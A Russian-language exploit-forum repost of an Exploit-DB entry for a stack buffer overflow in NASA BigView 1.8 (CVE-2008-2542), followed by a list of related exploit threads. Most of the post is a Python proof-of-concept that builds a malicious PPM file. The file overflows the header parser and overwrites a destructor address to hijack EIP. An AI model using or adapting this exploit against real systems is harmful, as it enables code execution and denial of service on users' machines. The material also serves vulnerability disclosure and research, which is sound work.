Exploit NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow (PoC)

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31872
Проверка EDB
  1. Пройдено
Автор
ALFREDO ORTEGA
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2008-2542
Дата публикации
2008-06-04
Код: 
source: https://www.securityfocus.com/bid/29517/info

NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Successful attacks will compromise the application and underlying computer. Failed exploit attempts will result in a denial of service.

BigView 1.8 is vulnerable; other versions may also be affected. 

/-----------

## BigView exploit
## Alfredo Ortega - Core Security Exploit Writers Team (EWT)
## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06
Desktop i386

import struct
w = open("crash.ppm","wb")
w.write("""P3
#CREATOR: The GIMP's PNM Filter Version
1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""")
# This exploit is not trivial, because the function PPM::ppmHeader()
doesn't return inmmediately, and we must modify internal variables to
cause an overwrite of a C++ string destructor executed at the end of the
function to gain control of EIP
# PS.: Congrats for the Phoenix mars Lander!
for i in range(7):
                w.write(chr(i)*4)
w.write("AA")
w.write(struct.pack("<L",0xaaaaaaaa))
w.write(struct.pack("<L",0xbbbbbbbb))
w.write(struct.pack("<L",0xcccccccc))
w.write(struct.pack("<L",0x08080000))
w.write(struct.pack("<L",0x08080000)*48)

#The address of the destructor is hard-coded. Sorry but this is only a 
PoC!
destination = 0x0805b294 # destructor
value = 0x41414141 #address to jump to
w.write(struct.pack("<L",destination)) # destination

w.write("""
%d 300
255
255
255
255
""" % value)
w.close()

- -----------/
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit NASA openVSP 3.16.1 - Denial of Service (PoC)
Ответы
0
Просмотры
565
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure
Ответы
0
Просмотры
460
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service
Ответы
0
Просмотры
434
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure
Ответы
0
Просмотры
418
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Http Parameter Contamination (HPC) Attack / Research Paper
Ответы
0
Просмотры
828
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Checkpoint/SofaWare Firewall Vulnerability Research
Ответы
0
Просмотры
844
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Short review of modern vulnerability research
Ответы
0
Просмотры
844
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Wolfram Research webMathematica 4.0 - File Disclosure
Ответы
0
Просмотры
356
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Rit Research Labs The Bat! 1.53 - Microsoft Denial of Service Device Name Denial of Service
Ответы
0
Просмотры
352
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds Denial of Service
Ответы
0
Просмотры
337
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу